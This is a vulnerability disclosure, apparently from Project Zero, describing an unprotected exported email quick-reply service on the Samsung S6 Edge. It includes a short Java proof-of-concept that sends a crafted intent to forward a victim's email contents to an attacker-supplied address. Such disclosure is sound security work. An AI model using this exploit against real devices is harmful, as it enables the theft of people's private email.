The SecEmailComposer/EmailComposer application used by the Samsung S6 Edge has an exported service action to do quick replies to emails. It was found that this action required no permissions to call, and could lead to an unprivileged application gaining access to email content.

Service Action: com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND
Component: com.samsung.android.email.composer
Class Name: com.samsung.android.email.composer.service.QuickReplyService

The service takes a JSON encoded string with various additional parameters. We need to know two parameters, the email address of the local account and a message ID. We can guess a valid message ID (which just seems to be an incrementing number).

If we guess an invalid ID the service simply returns, but if we do get a valid ID the service seems to automatically create the reply email, attach an attacker supplied message as well as the contents of the original message and sends it to any email address you like. For example:

Intent intent = new Intent();
intent.setAction("com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND");
intent.setClassName("com.samsung.android.email.composer",
       "com.samsung.android.email.composer.service.QuickReplyService");
intent.putExtra("data", "{'original-msg-id':1, " +
       "'account-id':'project.zero.victim@gmail.com', " +
       "'msg':'Hello World!'," +
       "'title':'Hello Title'," +
       "'toList':'project.zero.attacker@gmail.com'}");
ComponentName name = MainActivity.this.startService(intent);

No permissions are required to send this service intent. If successfully sent this will show up in a "sent email" notification and will be present user’s sent email folder.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.